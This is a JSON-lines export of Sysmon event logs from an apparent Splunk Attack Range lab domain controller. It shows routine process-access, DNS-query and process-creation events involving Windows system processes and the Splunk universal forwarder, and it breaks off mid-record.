{"EventTime":"2020-08-01 07:55:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3838,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:42.614\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:42.614","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3839,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:42.614\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:42.614","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3840,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:42.614\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FFE-5F25-0000-001076D10500}\r\nTargetProcessId: 4476\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:42.614","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FFE-5F25-0000-001076D10500}","TargetProcessId":"4476","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":3841,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:41.137\r\nProcessGuid: {41C8662E-1FFB-5F25-0000-0010E3B20500}\r\nProcessId: 3916\r\nQueryName: win-dc-6178966.attackrange.local\r\nQueryStatus: 0\r\nQueryResults: 10.0.1.14;\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:55:41.137","ProcessGuid":"{41C8662E-1FFB-5F25-0000-0010E3B20500}","QueryName":"win-dc-6178966.attackrange.local","QueryStatus":"0","QueryResults":"10.0.1.14;","Image":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","EventReceivedTime":"2020-08-01 07:55:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3842,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:43.287\r\nProcessGuid: {41C8662E-1FFF-5F25-0000-00103BD30500}\r\nProcessId: 1196\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:43.287","ProcessGuid":"{41C8662E-1FFF-5F25-0000-00103BD30500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:55:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3843,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:43.286\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1FFF-5F25-0000-00103BD30500}\r\nTargetProcessId: 1196\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:43.286","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1FFF-5F25-0000-00103BD30500}","TargetProcessId":"1196","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3844,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:43.286\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FFF-5F25-0000-00103BD30500}\r\nTargetProcessId: 1196\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:43.286","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FFF-5F25-0000-00103BD30500}","TargetProcessId":"1196","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3845,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:43.286\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:43.286","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3846,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:43.286\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:43.286","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3847,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:43.286\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 